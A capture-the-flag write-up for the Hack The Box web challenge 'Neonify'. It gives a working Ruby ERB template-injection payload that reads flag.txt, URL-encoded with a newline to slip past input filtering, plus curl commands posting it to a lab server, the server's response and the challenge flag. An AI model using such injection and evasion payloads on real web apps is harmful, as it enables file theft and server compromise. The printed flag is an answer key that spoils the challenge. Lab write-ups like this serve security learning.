It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

The vulnerability exploited is Server Side Template Injection.

A server-side template injection attack (SSTI) is when a threat actor exploits a template’s native syntax and injects malicious payloads into the template. The compromised template is then executed server-side. A template engine generates a web page by combining a fixed template with volatile data.

For retrieving the flag we need the following payload that is shown in the following code.

PAYLOAD ↓
=====================================
<%= File.open('flag.txt').read %>
=====================================

With the help of Ruby Retrieve, what we are going to do is to retrieve a file named flag.txt and it will show us what is contained in the same file, but we need to perform an encoding in URL format to avoid being detected as malicious.

Result ↓
======================
URL Encode ↓
==================
%0a%3c%25%3d%20%46%69%6c%65%2e%6f%70%65%6e%28%27%66%6c%61%67%2e%74%78%74%27%29%2e%72%65%61%64%20%25%3e

Gaining the flag with curl

Windows Curl 
curl.exe -i -s -k -d 'neon=a%0a%3c%25%3d%20%46%69%6c%65%2e%6f%70%65%6e%28%27%66%6c%61%67%2e%74%78%74%27%29%2e%72%65%61%64%20%25%3e'  94.237.58.211:51876
Linux Curl
curl -i -s -k -d 'neon=a%0a%3c%25%3d%20%46%69%6c%65%2e%6f%70%65%6e%28%27%66%6c%61%67%2e%74%78%74%27%29%2e%72%65%61%64%20%25%3e'  94.237.58.211:51876
o
curl -d 'neon=a%0a%3c%25%3d%20%46%69%6c%65%2e%6f%70%65%6e%28%27%66%6c%61%67%2e%74%78%74%27%29%2e%72%65%61%64%20%25%3e'  94.237.58.211:51876

Result

As a reminder, the flag is dynamic and changes with each request.

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 562
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: WEBrick/1.6.1 (Ruby/2.7.5/2021-11-24)
Date: Tue, 23 Jan 2024 05:37:27 GMT
Connection: Keep-Alive
<!DOCTYPE html>
<html>
<head>
    <title>Neonify</title>
    <link rel="stylesheet" href="stylesheets/style.css">
    <link rel="icon" type="image/gif" href="/images/gem.gif">
</head>
<body>
    <div class="wrapper">
        <h1 class="title">Amazing Neonify Generator</h1>
        <form action="/" method="post">
            <p>Enter Text to Neonify</p><br>
            <input type="text" name="neon" value="">
            <input type="submit" value="Submit">
        </form>
        <h1 class="glow">a
HTB{r3pl4c3m3n7_s3cur1ty}</h1>
    </div>
</body>
</html>

HTB{r3pl4c3m3n7_s3cur1ty}

This is a basic and interesting challenge, I hope the steps described above will be of great help for this challenge “Neonify” of HTB.

Thank you for reading my post feel free to share it on your social networks and friends to spread the knowledge to the right people.